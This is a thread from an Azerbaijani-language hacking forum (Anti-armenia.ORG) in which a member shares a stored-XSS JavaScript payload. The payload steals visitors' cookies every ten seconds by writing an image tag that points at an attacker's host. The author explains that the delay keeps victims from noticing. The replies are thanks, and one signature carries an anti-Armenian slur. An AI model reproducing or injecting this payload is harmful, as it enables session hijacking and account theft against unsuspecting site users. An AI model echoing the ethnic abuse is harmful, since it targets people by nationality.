Anti-armenia.ORG - Forumlar - Xss set time to send cookie



Istifadəçi
     2014-01-28 17:40 GMT                 

PuN!Sh3r


Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


Salam uşaqlar.Sizə xırda da olsa öz yazmam olan bir script təqdim edirəm.Bu script əsasən persisten(stored) xss atacklarda istifadə edilə bilər.
Bəzən saytlara javascript kodu inject edəndə location replace avtomatik olaraq cookieni yollayır və səhifəni də dəyişdirir.Bu isə victim i şübhələndirir.
Aşağıdakı kodları isə inject edəndə cookie sadəcə sayta girdikdən müəyyən vaxt sonra göndərilir.Ən azından daha az şübhə doğurur(Səhifə sabit qalır).

Kod:
<script type = "text/javascript">

function cookie(){
var cookie = document.cookie;
var time = new Date;
var hours = time.getHours();
var minutes = time.getMinutes();
var seconds = time.getSeconds();
document.write('<img src="http://site_for_accepting_cookies/?cookie='+cookie+':[time]:'+hours+':'+minutes+':'+seconds + '"'+ '/>');

}
setInterval("cookie()",10000);

</script>


Bu qədər.Bu script hərdəfə sayta daxil olanların cookiesini 10 səniyədən bir göndərir sənin hostuna.Sizdə öz yazdığınız hər hansı bir scriptlə query string dəki dəyərləri götürürsünüz.Bu qədər sadə .
Happy Hunting !!!!

Ps bunun ajax versiyasınıda hazırlayıb təqdim edəcəm.O versiya daha əla olacaq.Sadəcə vaxt azlığı

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
     
 

Istifadəçi
     2014-01-28 17:47 GMT                 

ViVa


İstifadəçi
Mesaj Sayı : 163
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Mexfi
Ölkə :
Məslək : Crypto Miner
Yaş : 121
Mesaj :

Mövzunu Paylaş!


Təşəkkür Kiçik Scripte Olsa Dəyərlidi

Anti-armenia.ORG
     
 

Istifadəçi
     2014-01-28 17:52 GMT                 

PuN!Sh3r


Gold
Mesaj Sayı : 308
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   35  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : W00t W00t
Ölkə :
Məslək : Cyber Security Specialist
Yaş :
Mesaj :

Mövzunu Paylaş!


çox sağolun dostlar rep verməyi unutmayın

Vətən Sağ olsun!
Duman salamat qal, Dağ salamat qal..
Anti-armenia.ORG
     
 

Istifadəçi
     2014-02-01 16:37 GMT                 

Ferid23


Admin
Mesaj Sayı : 1875
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Anti-armenia.ORG
Ölkə :
Məslək : Programmer & Defacer
Yaş : 12
Mesaj :

Mövzunu Paylaş!


Təşəkkür Qardaş

AZ Domaini İhbar Hattı (Azərbaycan saytlarında olan boşluqları bizə bildirin): http://anti-armenia.org/forums.php?m=posts&q=572
Qaydalar (Saytın qayda-qanunlarını oxuyaraq əməl edin)
Anti-armenia.ORG
     
 

Istifadəçi
     2014-02-01 17:54 GMT                 

GR33NM4X


İstifadəçi
Mesaj Sayı : 163
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Çox Saqol Bro Ardı Gelsin ...

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
     
 

Istifadəçi
     2014-11-11 01:04 GMT                 

Cahangir25


Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


WoooWW)Çox sağol qardaş!

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
     
 

Istifadəçi
     2019-03-22 18:41 GMT                 

MrTitanium


VIP
Mesaj Sayı : 34
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baki
Ölkə :
Məslək : Security
Yaş : 33
Mesaj :

Mövzunu Paylaş!


Respect👍

Ən böyük kəşf insanın özündə olanı tapmaqdır.
Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG